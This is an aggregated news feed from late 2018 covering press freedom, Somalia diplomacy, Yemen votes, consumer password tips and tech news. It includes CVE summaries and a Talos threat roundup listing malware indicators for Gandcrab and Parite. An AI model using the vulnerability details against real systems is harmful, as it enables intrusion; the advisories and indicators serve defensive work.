When a reporter asked Trump how long he would leave Acosta “in the penalty box”, the president responded: “As far as I’m concerned, I haven’t made that decision. But it could be others also.”

The White House retaliating against a reporter it doesn't like by denying him access altogether is a threat to all reporting on the president.

“If this kind of retaliation were allowed to go unchallenged, the White House would feel emboldened to use the threat of similar revocations as a means of discouraging critical news coverage,” Katie Fallow and Jameel Jaffer warned in the Columbia Journalism Review. “Other reporters would inevitably hesitate before asking White House officials sharp questions. If the president were allowed to ban reporters whose questions he didn’t like, the result would be press conferences that served only to celebrate, and not challenge, the administration’s agenda.”

In response to CNN’s suit, the government has argued that no one has a constitutional right to a press pass, and the president has the authority to decide which journalists he speaks with and allows into the White House.

“No journalist has a First Amendment right to enter the White House and the President need not survive First Amendment scrutiny whenever he exercises his discretion to deny an individual journalist one of the many hundreds of passes granting on-demand access to the White House complex,” the government’s attorneys wrote in an opposition to CNN’s motion [PDF].

The government’s argument may seem intuitive — as one Twitter user joked, “If having a press pass is a right, I want one!” — but it sidesteps the actual issues in the case.

“The question here is not, does anybody claiming to be a journalist have the right to attend a briefing at the White House or access to the White House facilities?” Jonathan Peters, a professor of journalism and law at the University of Georgia, told Freedom of the Press Foundation. “The question is, what process is due a journalist who has received a press pass from the White House before the White House revokes it? And, can the White House revoke a press pass based on [the journalist’s] content and viewpoint?”

In other words, Acosta may not have a right to a press pass, but he does have the right not have the government arbitrarily take his press pass away.

Timothy Kelly, the federal judge presiding over CNN’s case against the president, seemed to accept with that reasoning when he granted CNN’s motion for a temporary restraining order on Friday.

Following the judge’s order, the White House begrudgingly reinstated Acosta’s press pass, but the lawsuit remains ongoing.

In remarks at the Oval Office, president Trump suggested that he would ultimately prevail in court, once the White House set up a standard process for revoking journalists’ press credentials.

“You have to act with respect when you’re at the White House, and when I see the way some of my people get treated at news conferences, it’s terrible. So we’re setting up a certain standard, which is what the court is requesting,” he said.

“We will end up back in court and we will win,” he added.

Cheaper, Disc-Free Xbox One Coming Next Year, Report Says

An anonymous reader quotes a report from Ars Technica: Microsoft is planning to release a disc-free version of the Xbox One as early as next spring, according to an unsourced report from author Brad Sams of Thurrott.com (who has been reliable with early Xbox-related information in the past). The report suggests the disc-free version of the system would not replace the existing Xbox One hardware, and it would instead represent "the lowest possible price for the Xbox One S console." Sams says that price could come in at $199 "or lower," a significant reduction from the system's current $299 starting price (but not as compelling compared to $199 deals for the Xbox One and PS4 planned for Black Friday this year). Buyers will also be able to add a subscription to the Xbox Games Pass program for as little as $1, according to Sams. For players who already have games on disc, Sams says Microsoft will offer a "disc to digital" program in association with participating publishers. Players will be able to take their discs into participating retailers (including Microsoft Stores) and trade them in for a "digital entitlement" that can be applied to their Xbox Live account.

Read more of this story at Slashdot.

U.S. Returns to Mogadishu With Revamped Diplomatic Outpost, 25 Years After “Black Hawk Down” Battle

The United States has maintained an arms-length diplomatic relationship with Somalia since two American Black Hawk helicopters were shot down in Mogadishu in 1993. But an increase in activity in recent years is set to culminate this weekend, with the quiet opening of a renovated and expanded building that will apparently serve as an unofficial U.S. embassy or consulate in Mogadishu, according to diplomatic and other sources in the city. The facility will allow for a permanent diplomatic presence in the country, a place for the U.S. to host meetings and for limited staff to be based.

U.S. officials are reluctant to discuss the building and its intended uses; the government seems keen to indicate it is neither an embassy nor a consular office. However, in a sign of the apparent importance of the building, the new U.S. ambassador to Somalia, Donald Yamamoto, who is based in neighboring Kenya, arrived in Mogadishu this week and is expected to formally inaugurate the facility on Saturday. Despite requests, the State Department would not allow an Intercept reporter to attend the opening ceremony.

The U.S. has not had an embassy or consulate in Somalia since 1991, when Americans were evacuated amid an anti-government uprising that catalyzed the complete collapse of the Somali state and deepened a long and bloody civil war. Relations between the U.S. and Somalia took a historic turn two years later with the “Black Hawk Down” incident, which took place during a U.S.-led military intervention precipitated by food shortages and political chaos. In that famous incident, two U.S. military helicopters were shot down, and a total of 18 American soldiers were killed during a raid to capture allies of a Somali warlord, Mohamed Farah Aidid. The Black Hawks crashed into Bakara, the main market in Mogadishu, sparking a 15-hour gun battle; the bodies of some of the U.S. soldiers were dragged through the streets. Those gory images and the subsequent national horror have since shaped U.S. policy abroad, influencing former President Bill Clinton’s decision not to put boots on the ground to intervene in the 1994 genocide in Rwanda or in Bosnia.

The U.S. building is located in Mogadishu’s equivalent of what was known as the “Green Zone” in Baghdad during the U.S. occupation of Iraq. At the moment, the vast majority of foreigners who come to the Somali capital do not even leave the massive airport complex-cum-military base that stretches across a section of the Mogadishu shoreline. The compound, secured by blast walls, is protected by the African Union Mission in Somalia and is entirely segregated from the rest of the city. Even Somali politicians entering the compound have to go through airport-style security managed by Ugandan soldiers. Along with the United Nations camp and security contractors, the U.K. and the EU keep embassies inside the airport. Turkey, Saudi Arabia, and the Gulf States have embassies in the city proper (a move greatly appreciated by the public, many of whom find it offensive that foreigners would come to work in their country but never actually leave the airport compound).

That the building is technically not an embassy or a consulate, but has been fixed up for diplomatic uses in the renovation, is likely a compromise between government officials pushing for a concrete diplomatic presence, and those who are more gun shy. But Americans, foreigners, and Somalis who work in the airport compound refer to the building as “the embassy” in passing, and the distinction will likely remain a technicality on the ground. It is not known if the American flag will be raised outside of this building.

During former Secretary of State John Kerry’s surprise visit to Somalia in 2015, U.S. officials floated plans to reinstate an embassy before the end of the Obama administration’s term. A building was at least partially erected but over time the U.S. has been walking back plans for its completion. The likely factors for the delay are increased safety-guidelines instituted in the wake of the attack on the U.S. mission in Benghazi in Libya, in 2012, and the continuously delicate security situation in Somalia.

The militant group al Shabaab, an Al Qaeda offshoot, is omnipresent and active in Somalia, and contributes to a high level of insecurity. Less than two weeks ago, at least 50 people were killed in dual car bombs in Mogadishu. Small-scale attacks and assassinations are a regular occurrence, and last year, al Shabaab staged a particularly bloody attack, bombing a busy junction at rush hour and killing between 500 and 1,000 people.

Since the Black Hawk incident, the U.S. has generally kept diplomatic staffers out of Somalia, while contributing significant amounts of humanitarian assistance and conducting drone strikes and airstrikes to destabilize al Shabaab, which is at war with the internationally recognized government in Mogadishu. In recent years, most U.S. diplomatic activity on the ground has consisted of day visits to the capital.

While the diplomatic footprint has been light, the U.S. has continued to bolster itself militarily in Somalia. In 2015, news broke about secret U.S. drone bases where a handful of special forces were stationed. One of those bases was at Baledogle, which has been fast expanding and is now a forward operating base with hundreds of beds. Last month, the Pentagon invested $12 million for “emergency runway repairs” there.

Reporting for this story was supported with funding from the Investigative Fund.

The post U.S. Returns to Mogadishu With Revamped Diplomatic Outpost, 25 Years After “Black Hawk Down” Battle appeared first on The Intercept.

Alchemy and Science: Fantastic Beasts’ real-life connection to a 14th century Parisian scribe

With the new Fantastic Beasts film — the second in the franchise, J.K. Rowling takes audiences deeper into the world that pre-dated Harry Potter and his friends. Newt Scamander’s 1920s New York and Europe is alive with wizardry, magic and…alchemy. Rowling has often drawn from mythology and folklore to create the Potter universe, with key elements like the philosopher’s stone and the real life alchemist who discovered it having a place in true history…. strengthening the connection bet

Japan’s Cybersecurity Minister Admits He’s ‘Never Used A Computer’

Japan’s new cybersecurity minister has ‘never used a computer’–claiming to have delegated to staff and secretaries since he was 25. This is especially interesting because his duties include overseeing cyber-defense preparations for the 2020 Olympic Games in Tokyo. In addition, Sakurada allegedly struggled to answer a follow-up question about whether USB drives were in use at the country’s nuclear power stations.

With the total cost of cybercrime committed expected to cost global businesses over $2 trillion by 2019, this revelation has raised concern, and the impact could weigh on Japan’s state of cybersecurity.

Two cybersecurity experts have commented on the incident below.

Bryan Becker, Application Security Researcher at WhiteHat Security:

“With Japan’s new Cybersecurity Minister Yoshitaka Sakurada admitting he’s never used a computer in his life, we can expect to see some unusual developments coming from their end. Remember when Zuckerberg was interviewed by a special hearing, and senators asked him questions as if they had never used the internet before? Not to be outdone, Sakurada is going to be developing policy without even having used a computer before!

All of that aside, if Sakurada is going to be effective, one likely option would be for him to turn to the private sector for help. There are probably going to be some very lucrative contracts available for partnerships with the Japanese government in the near future.

On the other hand, there is something to be said of the security of a man who’s never used a computer in his life. You can’t hack something that’s not there!”

Jeremy Cheung, Vulnerability Verification Specialist at WhiteHat Security:

“Whereas it’s generally possible for someone to be in a managerial position, without holding any technical expertise, it isn’t ideal for achieving high-quality results. Due to the nature of the cybersecurity industry involving not only technical devices but private data and personally identifiable information, the ramifications of someone in this position not holding any hands-on industry experience are quite severe. Without having ever even used a computer, Sakurada’s knowledge of cybersecurity practices, exploits and remediation are theoretical at best, which greatly increases the chance of compromise and a potential repeat of the Pyeongchang Winter Olympic Games Cyberattack. In preparation for the 2020 Olympic Games, Sakurada should definitely get in the trenches with his staff and experience what goes on in building a secure cyber-defense plan. To stop a hacker, you have to try to think like a hacker!”

The ISBuzz Post: This Post Japan’s Cybersecurity Minister Admits He’s ‘Never Used A Computer’ appeared first on Information Security Buzz.

Google Cloud Executive Who Sought Pentagon Contract Steps Down

Diane Greene, whose pursuit of Pentagon contracts for artificial intelligence technology sparked a worker uprising at Google, is stepping down as chief executive of the company's cloud computing business (Warning: source may be paywalled; alternative source). "Ms. Greene said she would stay on as chief executive until January. She will be replaced by Thomas Kurian, who oversaw product development at Oracle until his resignation in October. Ms. Greene will remain a board director at Google's parent company, Alphabet," reports The New York Times. From the report: The change in leadership caps a turbulent three years for Ms. Greene, who was brought on to expand Google's cloud computing business. Google Cloud has struggled to make major inroads in persuading corporate customers to use its computing infrastructure over alternatives like Amazon's A.W.S. and Microsoft's Azure. In a blog post published by the company, Ms. Greene said she had initially told friends and family that she was planning to run Google Cloud for only two years but stayed for three. Ms. Greene, a widely respected technologist and entrepreneur, said that after leaving Google Cloud, she planned to help female founders of companies by investing in and mentoring them. Ms. Greene joined Google in 2015 when it acquired Bebop, a start-up she had founded, for $380 million. Ms. Greene defended Google's pursuit of a Defense Department contract for the Maven program, which uses AI to interpret video images and could be used to improve the targeting of drone strikes. In March, she said it was a small contract worth "only" $9 million and that the technology would be used for nonlethal purposes.

Read more of this story at Slashdot.

DigiByte (DGB) Recovers 15% as Testing Begins on ASIC-Defeating Algorithm

DigiByte (DGB) showed strong signs of recovery on Friday, as the coin price made up 15% of its value after the recent market dip. Testing has begun on a self-adjusting algorithm which changes itself every ten days. According to the DigiByte team, and founder Jared Tate, such a move would see the threat of ASIC […]

The post DigiByte (DGB) Recovers 15% as Testing Begins on ASIC-Defeating Algorithm appeared first on Hacked: Hacking Finance.

Naked Security – Sophos: Could have sworn I deleted that photo from my phone! [PODCAST]

This week: hacking phones at Pwn2Own, the brand new SophosLabs Threat report, and squeezing Shakespeare into one tweet. Enjoy!













Download audio: http://feeds.soundcloud.com/stream/531032670-sophossecurity-ep-009-competitive-hacking-threat-report-and-crazy-tweets.mp3

Naked Security - Sophos

Linux 4.20 is Running Slower Than 4.19 On Intel CPUs

Freshly Exhumed writes: An intentional kernel change in Linux kernel 4.20 for enhanced Spectre mitigation is unfortunately causing Intel Linux performance to be much slower than with 4.19. That change is 'STIBP' (Single Thread Indirect Branch Predictors), which allows for preventing cross-hyperthread control of decisions that are made by indirect branch predictors. It affects Intel systems that have up-to-date microcode and CPU Hyper Threading enabled. Phoronix gives the evidence.

Read more of this story at Slashdot.

What Your Password Says About You

At the end of last year, a survey revealed that the most popular password was still “123456,” followed by “password.” These highly hackable choices are despite years of education around the importance of password security. So, what does this say about people who pick simple passwords? Most likely, they are shooting for a password that is easy to remember rather than super secure.

The urge to pick simple passwords is understandable given the large number of passwords that are required in our modern lives—for banking, social media, and online services, to simply unlocking our phones. But choosing weak passwords can be a major mistake, opening you up to theft and identity fraud.

Even if you choose complicated passwords, the recent rash of corporate data breaches means you could be at even greater risk by repeating passwords across accounts. When you repeat passwords all a hacker needs to do is breach one service provider to obtain a password that can unlock a string of accounts, including your online banking services. These accounts often include identity information, leaving you open to impersonation. The bad guys could open up fraudulent accounts in your name, for example, or even collect your health benefits.

So, now that you know the risks of weak password security, let’s see what your password says about you. Take this quiz to find out, and don’t forget to review our password safety tips below!

Password Quiz – Answer “Yes” or “No”

  1. Your passwords don’t include your address, birthdate, anniversary, or pet’s name.
  2. You don’t repeat passwords.
  3. Your passwords are at least 8 characters long and include numbers, upper and lower case letters, and characters.
  4. You change default passwords on devices to something hard to guess.
  5. You routinely lock your phone and devices with a passcode or fingerprint.
  6. You don’t share your passwords with people you’re dating or friends.
  7. You use a password manager.
  8. If you write your passwords down, you keep them hidden in a safe place, where no one else can find them.
  9. You get creative with answers to security questions to make them harder to guess. For example, instead of naming the city where you grew up, you name your favorite city, so someone who simply reads your social media profile cannot guess the answer.
  10. You make sure no one is watching when you type in your passwords.
  11. You try to make your passwords memorable by including phrases that have meaning to you.
  12. You use multi-factor authentication.

Now, give yourself 1 point for each question you answered “yes” to, and 0 points for each question you answered “no” to. Add them up to see what your password says about you.

9-12 points:

You’re a Password Pro!

You take password security seriously and know the importance of using unique, complicated passwords for each account. Want to up your password game? Use multi-factor authentication, if you don’t already. This is when you use more than one method to authenticate your identity before logging in to an account, such as typing in a password, as well as a code that is sent to your phone via text message.

4-8 points

You’re a Passable Passworder

You go through the basics, but when it comes to making your accounts as secure as they can be you sometimes skip important steps. Instead of creating complicated passwords yourself—and struggling to remember them—you may want to use a password manager, and let it do the work for you. Soon, you’ll be a pro!

1-3 points

You’re a Hacker’s Helper

Uh oh! It looks like you’re not taking password security seriously enough to ensure that your accounts and data stay safe. Start by reading through the tips below. It’s never too late to upgrade your passwords, so set aside a little time to boost your security.

Key Tips to Become a Password Pro:

  • Always choose unique, complicated passwords—Try to make sure they are at least 8 characters long and include a combination of numbers, letters, and characters. Don’t repeat passwords for critical accounts, like financial and health services, and keep them to yourself.Also, consider using a password manager to help create and store unique passwords for you. This way you don’t have to write passwords down or memorize them. Password managers are sometimes offered as part of security software.
  • Make your password memorable—We know that people continue to choose simple passwords because they are easier to remember, but there are tricks to creating complicated and memorable passwords. For instance, you can string random words together that mean something to you, and intersperse them with numbers and characters. Or, you can choose random letters that comprise a pattern only know to you, such as the fist letter in each word of a sentence in your favorite book.
  • Use comprehensive security software—Remember, a strong password is just the first line of defense. Back it up with robust security softwarethat can detect and stop known threats, help you browse safely, and protect you from identity theft.

For more great password tips, go here.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Homeon Twitter, and like us on Facebook.

The post What Your Password Says About You appeared first on McAfee Blogs.

CVE-2018-15769

RSA BSAFE Micro Edition Suite versions prior to 4.0.11 (in 4.0.x series) and versions prior to 4.1.6.2 (in 4.1.x series) contain a key management error issue. A malicious TLS server could potentially cause a Denial Of Service (DoS) on TLS clients during the handshake when a very large prime value is sent to the TLS client, and an Ephemeral or Anonymous Diffie-Hellman cipher suite (DHE or ADH) is used.

Air Quality in San Francisco is So Bad that Uber Drivers Are Selling Masks Out of Their Cars

California's devastating wildfires are causing unhealthy air conditions for locals breathing in harmful fumes. From a report: In San Francisco, which currently has the second-worst-rated air quality out of any city in the world, one driver was spotted selling N95 respirator masks for $5 apiece. That's significantly above market rate. Right now you can buy a 10-pack of similar masks for about $13 on Amazon. But considering the masks are sold out at many local stores, riders may be willing to dish out the cash for immediate access to the protective gear. Further reading: California needs to reinvent its fire policies, or the death and destruction will go on.

Read more of this story at Slashdot.

Firefox adds in-browser notification of breached sites

Mozilla has added a data breach notification to Firefox that warns the browser's users when their email address and credentials may have been obtained by hackers.

Dubbed Firefox Monitor, the free breach notification service debuted in September after some testing during the summer. Anyone -- not only Firefox users -- can steer to the service website, enter an email address and be told if that address was among those involved in successful, publicly-known breach attacks. Next steps were up to the user, including the obvious of changing the password(s) connected to that email address and/or website(s).

Notifications of the latest breaches were sent by Firefox Monitor to the user-submitted address. "Your email address will be scanned against those data breaches, and we'll let you know through a private email if you were involved," wrote Nick Nguyen, Mozilla's vice president of product strategy, in a Sept. 25 post to a company blog.

To read this article in full, please click here

Market Update: U.S. Stocks Steady After Turbulent Week; Bitcoin ABC Leads Hash War

U.S stocks finished mostly higher in turbulent trading Friday, as the large-cap S&P 500 Index eked out its second consecutive advance on the back of utilities and energy companies. Cryptocurrencies appear to have stabilized following a $37 billion plunge, as the primary implementation of the bitcoin cash hard fork continued to edge out the competing […]

The post Market Update: U.S. Stocks Steady After Turbulent Week; Bitcoin ABC Leads Hash War appeared first on Hacked: Hacking Finance.

Amazon Has Everything it Needs To Make Massively Popular Algorithm-Driven Fiction

Thu-Huong Ha, writing for Quartz: Amazon's power in books extends way beyond its ability to sell them super cheap and super fast. This year, a little over 40% of the print books sold in the US moved through the site, according to estimates from Bookstat, which tracks US online book retail. (NPD, which tracks 85% of US trade print sales, declined to provide data broken out by retailer.) In the US, Amazon dominates ebook sales and hosts hundreds of thousands of self-published ebooks on its platforms, many exclusively. It looms over the audiobook scene, in retail as well as production, and is one of the biggest marketplaces for used books in the US. Amazon also makes its own books -- more than 1,500 last year. All that power comes with great data, which Amazon's publishing arm is well positioned to exploit in the interest of making books tailored exactly to what people want -- down to which page characters should meet on or how many lines of dialogue they should exchange. Though Amazon declined to comment specifically on whether it uses data to shape or determine the content of its own books, the company acknowledged that authors are recruited for their past sales (as is common in traditional publishing). "Amazon Publishing titles are thoughtfully acquired by our team -- made up of publishing-industry veterans and long-time Amazonians -- with many factors taken into consideration," says Amazon Publishing publisher Mikyla Bruder, "including the acquiring editor's enthusiasm, the strength of the story, quality of the writing, editorial fit for our list, and author backlist/comparable titles' sales track." Amazon's Kindle e-reader, first released in 2007, is a data-collection device that doubles as reading material. Kindle knows the minutiae of how people read: what they highlight, the fonts they prefer, where in a book they lose interest, what kind of books they finish quickly, and which books gets skimmed rather than read all the way through. A year after the Kindle came out, Amazon acquired Audible. Audiobooks have been a rare bright spot in the publishing industry, with double-digit growth in total sales for the past few years. Audible now touts itself as the "world's largest seller and producer of downloadable audiobooks and other spoken-word entertainment," and its site has around 450,000 audio programs.

Read more of this story at Slashdot.

CVE-2018-18955

In the Linux kernel 4.15.x through 4.19.x before 4.19.2, map_write() in kernel/user_namespace.c allows privilege escalation because it mishandles nested user namespaces with more than 5 UID or GID ranges. A user who has CAP_SYS_ADMIN in an affected user namespace can bypass access controls on resources outside the namespace, as demonstrated by reading /etc/shadow. This occurs because an ID transformation takes place properly for the namespaced-to-kernel direction but not for the kernel-to-namespaced direction.

Mailing Tech Support a Bomb

I understand his frustration, but this is extreme:

When police asked Cryptopay what could have motivated Salonen to send the company a pipe bomb ­ or, rather, two pipe bombs, which is what investigators found when they picked apart the explosive package ­ the only thing the company could think of was that it had declined his request for a password change.

In August 2017, Salonen, a customer of Cryptopay, emailed their customer services team to ask for a new password. They refused, given that it was against the company's privacy policy.

A fair point, as it's never a good idea to send a new password in an email. A password-reset link is safer all round, although it's not clear if Cryptopay offered this option to Salonen.

Oops: House Democrats Mistakenly Cast Votes Blocking Resolution on Ending Yemen War

In a political maneuver that was equal parts bizarre and grimly predictable, Republican leaders on Capitol Hill moved yet again on Wednesday to block a vote to wind down U.S. military support for the war in Yemen, this time by tucking a parliamentary procedure into a rule governing legislation that removes gray wolves from the endangered species list.

The measure narrowly passed with a 201-187 vote, preventing any action on the war in Yemen this legislative session.

What’s more, several of the co-sponsors of the Yemen resolution to end the war either voted to advance the wolf bill or abstained from the vote entirely, meaning that they played a part in preventing their own bill from reaching the House floor.

Adding to the confusion, two of the six House Democrats who joined Republicans in beating back the Yemen bill have told The Intercept that they cast their votes in error.

“Mr. Vela’s vote was actually mistake – we are in the process of changing it,” wrote Mickeala Carter, a spokesperson for Rep. Filemon Vela, D-Texas, who voted for the rule that prevented the Yemen vote.

Rep. Anna Eshoo, D-Calif., is a co-sponsor of the Yemen legislation, which invokes the 1973 War Powers Act to compel the Trump administration to remove U.S. forces from “hostilities” related to the Saudi Arabia-led intervention. Eshoo voted for the measure blocking her own resolution from reaching the floor, a move that puzzled human rights advocates.

“She is a cosponsor of the Resolution and made a mistake on the vote,” wrote Emma Crisci, a spokesperson for Eshoo’s office, in an email to The Intercept. “The Congresswoman is submitting a statement for the Congressional Record saying that she made a mistake in voting and meant to vote NO on the rule.”

Four other House Democrats — Reps. Gene Green and Vicente González of Texas, Collin Peterson of Minnesota, and Jim Costa of California — also voted for the rule to prevent the Yemen bill from reaching the floor, and did not respond to a request for comment.

Rep. Ken Buck, R-Colo., signed on as a co-sponsor of the legislation to wind down the war in Yemen in October. Buck was selected by GOP leadership this cycle to serve on the House Rules Committee, a powerful post that determines the fate of legislation. Curiously, Buck abstained from the House Rules Committee vote on the rule undercutting his own bill when leadership moved to combine the provision curbing the Yemen vote with the wolf legislation, and then voted in favor of the rule when it reached the floor on Wednesday. Buck also did not respond to a request for comment.

Congress never authorized U.S. support for the war in Yemen, but the American military provides backing for the bloody conflict, which has taken more than 10,000 lives and threatens more than 14 million people with imminent famine.

As the crisis worsens, human rights activists continue to urge an end to the war.

Last week, the U.S. military said it would discontinue refueling coalition warplanes bombing Yemen. But the United States continues to play a pivotal role in the war, providing U.S.-manufactured arms and logistical support to UAE and Saudi forces occupying Yemen and blockading the country’s ports.

David Segal, a co-founder of the activist group Demand Progress, said that Eshoo’s “mistaken vote was unfortunate,” but that she “should be applauded for co-sponsorship of the underlying resolution, and she will hopefully have the opportunity to vote to end our involvement in the war on Yemen through another War Powers Resolution in coming months.”

Segal, however, noted that several of the Democrats voting with the Republican majority to kill the Yemen bill this session have long supported the conflict. Green, for example, voted in 2016 to support the transfer of cluster bombs to Saudi Arabia, and has been “more complicit than the average Democrat in the decimation of Yemen,” Segal said.

Segal has long advocated on the issue. He previously served in the Rhode Island state legislature, where he pressed Textron, the defense contractor that once manufactured cluster munitions, on ending the development of the weapon.

Still, when the new class of House Democrats elected in the midterms this year takes office in January, the lead sponsors of the Yemen resolution plan to reintroduce the bill, which now has the support of much of House Democratic leadership.

The post Oops: House Democrats Mistakenly Cast Votes Blocking Resolution on Ending Yemen War appeared first on The Intercept.

Threat Roundup for Nov. 9 to Nov. 16



Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 09 and Nov. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Ransomware.Gandcrab-6748603-0
    Ransomware
    Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB", ".CRAB" or ".KRAB." It's spread through traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft.
     
  • Win.Virus.Parite-6748128-0
    Virus
    Parite is a polymorphic file infector. It infects executable files on the local machine and on network drives.
     
  • Win.Malware.Dijo-6748031-0
    Malware
    Win.Malware.DIJO, also known as Ursnif, is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
     
  • Win.Malware.Vobfus-6747720-0
    Malware
    Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will run when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
     
  • Win.Downloader.Upatre-6746951-0
    Downloader
    Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware.
     
  • Win.Malware.Emotet-6745295-0
    Malware
    Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products. It is commonly spread via malicious emails.
     

Threats

Win.Ransomware.Gandcrab-6748603-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c
  • \BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=ab8e4b3e3c28b0e4
  • Global\7bf1bf81-e78a-11e8-a007-00501e3ae7b5
IP Addresses contacted by malware. Does not indicate maliciousness
  • 66[.]171[.]248[.]178
Domain Names contacted by malware. Does not indicate maliciousness
  • ipv4bot[.]whatismyipaddress[.]com
Files and or directories created
  • %AllUsersProfile%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5
  • %AppData%\Microsoft\umitoa.exe
  • %AppData%\Microsoft\hhbbvc.exe
  • \Win32Pipes.000006c8.00000045
  • \Win32Pipes.000006c8.00000047
  • \Win32Pipes.000006c8.00000049
File Hashes
  • 008e2453c3bba10629ae8f7f32c6377d91bd17326da52295f038d7badd53cf4f
  • 00f07cc799aabac7449a324ff47161a6a34ad02ba4b2074ddb382152d383ed14
  • 02edf037074ebd2445625737108f7337715a6af17ec161429fa0392894e479bd
  • 04196939eee8a21a4480a5e5bcf34f70b20f1dad9c3038bc632a415130ac47e8
  • 043f30bd958e54d6947631c10d70ddec772ababd8a3852ceb0e646e87d670a92
  • 051f4d57fc51e1491eb9121cb6ecdd036e140103f1afbc73fe9cef9a4fd67a84
  • 06cafb061ce341647e48d4113eb71bed76290d30d54ce6d98169fcfe8bbe83c5
  • 0799d33c49bceeeeb9c92077d448d5823ab8e71a04b71c6b8afa7f386fb5aa92
  • 08d56fc6c0622c2e931f04eb8c68a25fa431ac4833b1cbd7e44847d55f7f26e1
  • 09abf839c42200b000d3065d2cda41d858be415a521a5cb2b77b6e62503ae460
  • 0a48f61677791bca8d2553662ec6bce8acfdb3249cfcabac2802ba216ac54262
  • 0acc350e791e4201a7dd17e389ba8e03264343020432389d3e1b9d08874005af
  • 0b3e086550e4baaa05c69777d484b9b20773b01d5c6da124197eff423b798b04
  • 0dd771fecae00517f9297e21a42956d2ee113f6f0bc4d3ee277f887721efc19a
  • 0f2784bc6fb959eace7e44fd19fd08fbfa39af04b4f793241c3eddd4183dbe71
  • 0f50d6433d2a79f30c2417fc434098d029eceedf3acd405901d3951208be2ae7
  • 10b5897f820d7ae3fe0194b8969c42c5c5de6cc658baf95699f8a781e18237ff
  • 130f32c65f3f2e67bdc228f125bc07c049f40fae04114b0de920e9fd0b00bccf
  • 13ab0a6dcd3cfd5136b54d11739169917df37a5681189baf92c4c6b0a2df0bc9
  • 13ccda5af78a1dea028d076418db880ab3734c745f068d2c4df5de4d4968b478
  • 14094b6a6ba1af401829963ce991e02c0eb9da885eb3837cec88f1559e2007c6
  • 166627c9ad4fb0acb0bec8e09e1d4ceedc3110e7cdbaa709322d0dbe41a2f70f
  • 17b78d2828794c9612cc87b09b7254c32c810134e5d06742058c55ec55ddb746
  • 19b4d752b0be5e81c835bd3b87f3c1124c208ba6adb2150f7b85a1b76222350f
  • 1ac89466a2668afd8d06d0f9345d48151dc2978b81985070bb23e30a767bd71c

Coverage


Screenshots of Detection

AMP




ThreatGrid



Win.Virus.Parite-6748128-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Residented
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %AppData%\Wplugin.dll
  • %WinDir%\Wplugin.dll
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yma1.tmp
  • %LocalAppData%\Temp\neb2886.tmp
File Hashes
  • 00ad96301d29476dba58c071ef5bc4cf5eb265e9181a1d866bcacfe847199f64
  • 01edcc04020177e2f31b13d9f6a46db2e058028011151850b0802394ccda8d77
  • 05f816442e9d1d18a80233674af70d0ce6e17d10768d8f0e77973566b07aba8e
  • 0e70c57c577078b1c9cab7d6bd1215372330548ae0c20ff2b80f0cb86cde2074
  • 115995a5dc32df9da2f214cf9f4f81341daf7bc101c1b9346bead99428acb15e
  • 145c7866de76f33e571f19a1a40c2e12c900a6a1ad9bac30b46dcdc28be6feec
  • 14ac990a0affb831e4dccee45cff19e8a7c28dc5b93f731131ffa1c319e43823
  • 15c7b9a2c4688af296b57ac418f01347c8fbbd74ac5fbcae17c90f9bcdfb8e26
  • 16ee4360c7d1b78da48d06889177668120dfcaf62745bbc8c88d7864d28ba43d
  • 1817a467dba009e325a1c8bbaa5c274ec80856f8936321980fee86a0e33a34cd
  • 181dd25663e2628e56410e65b57677f5f3346866ccb737aa2eab8dd7376a11af
  • 1c8698e1bd9fa33f8f664a0a12e90db53e91e31414cd307c21575a5d039b0d32
  • 1eece81891ab4f4836931f8b1bc630e044d08ed659797dc19afc3bebd3b2b259
  • 1fa3b372ec521a5b57a52d8b6a5ec8de67f5d8f80e87835b67b4916d4e5dd415
  • 29f37223352f9584de101958ce00b41c3c66d9cfb15cc27d22a67df2c9dcd53e
  • 2aea31075160d93b13bb726dc95b2a46505deefa529f8c9edfd9f6ecd8d80a37
  • 300655178fabae5c65e48307fef7de67100b7d866b118f1ca0f0919de7e3a490
  • 35270fa68190eba46f59bba10c8dce3a03e55d8af7e8a33f9a330e077f63aeff
  • 39cb46a92889429d3dfc422381b46d04f9e69af0a088eec656845f184ed0b8f2
  • 3b6a4dbf9a923ac935f6f671b38de0ed83da428b74dea48efa180365a507e13f
  • 452ce18b59c1ab0cb4925435edf60edcfc5114cdea15056702e69c45af5763a2
  • 4e38b473973bce00cf5f60b545327db9c9e8b17225262e88d13299f6abf579f2
  • 51a323f3b47edc969017af5b31d364d4f23574471a52511970aaf54a8c34c382
  • 51bbe9d3ae4bd23f31fd90ddf0d8af295ca98773653a16c2bb5a950670352888
  • 525bc89d56339ce9423aae276228a8b879d7156ecadff7054a397a8d5178f5f0

Coverage


Screenshots of Detection

AMP




ThreatGrid



Win.Malware.Dijo-6748031-0


